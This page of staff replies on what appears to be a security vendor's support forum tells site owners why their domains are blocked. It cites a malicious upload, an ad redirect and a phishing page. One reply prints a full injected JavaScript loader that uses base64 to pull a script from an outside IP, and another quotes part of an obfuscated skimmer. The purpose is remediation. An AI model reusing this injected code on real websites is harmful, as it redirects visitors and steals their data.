Jump to content

Dashke

Staff
  • Posts

    5,829
  • Joined

Posts posted by Dashke

  1. 21 hours ago, RandyM said:

    Two professors have attempted to access our web mail system from home. Both are using MalwareBytes Premium 4.3.0 with Real-Time Protection.

    They are allowed to log in but receive an error that the web site is being blocked because of phishing. The behavior began this morning (Monday). The server is law.stcl.edu (207.81.174.171).

    Hello RandyM,

    Can you remove this malicious file, please -

    stcl.edu/wp-content/uploads/formidable/116/hq-Demon-Slayer-Mugen-Train-Movie-Online-8-May.pdf

    ?

  2. 16 hours ago, soundrussian said:

    Our domain a.o333o.com has been marked as Malvertising. We use it to redirect a visitor to a specific ad from another ad network.

    We are a service that allows publishers to display ads from different Ad Networks through our scripts, and sometimes bad ads may leak through. Perhaps that's why our domain has been marked as Malvertising. We do our best to remove bad ads as soon as possible, so we believe that no malvertising is served through our domain.

    VirusTotal has no complaints about our domain: https://www.virustotal.com/gui/url/f140eb535e47875a6fdfdd3f5f63261b33c842ec36677b4a7bd4adaa0a94c1d7/detection

    Please, remove a.o333o.com from the block list.

    Please remove this redirect -

    https://a.o333o.com/api/direct/29348

    Thank you for your help!

  3. Hello Jouni,

    It seems that your website has been infected with a malicious script -

    <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

    Can you check the source code and remove it, please?

  4. On 4/16/2021 at 9:41 PM, Linetsky said:

    Malwarebytes suddenly started blocking cgmfoods.com. I looked at the logs but nothing useful. How can I resolve this issue? The website was scanned on virus total and showed up healthy.

    Hello Linetsky,

    Unfortunately, your website is infected with a skimmer, please remove this malicious script from your website -

    <script>var _0x43fe=["\x68\x61\x73\x68\x43\x6F\x64\x65","\x70\x72\x6F\x74\x6F\x74\x79\x70\x65","\x6C\x65\x6E\x67\x74\x68"," etc.

    Thanks!

  5. 15 hours ago, kinsta_abuse_team said:

    Hi this is Sal from Kinsta's Malware & Abuse team.

    We recently became aware there is a wildcard block on *.kinsta.cloud - this is impacting all subdomains on our platform. Please remove the wildcard block and just do a subdomain block to avoid impacting everyone and just blocking the infected sites. We look forward to your feedback to collaborate on this issue.

    Thanks

    Salvador Aguilar
    Malware & Abuse Engineer

    Hello Salvador,

    Can you please remove the phishing page that is hosted here -

    saudiiposthomee.kinsta.cloud/saudis/box_tracks/box_track/index/

    ?

    Thanks!

Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.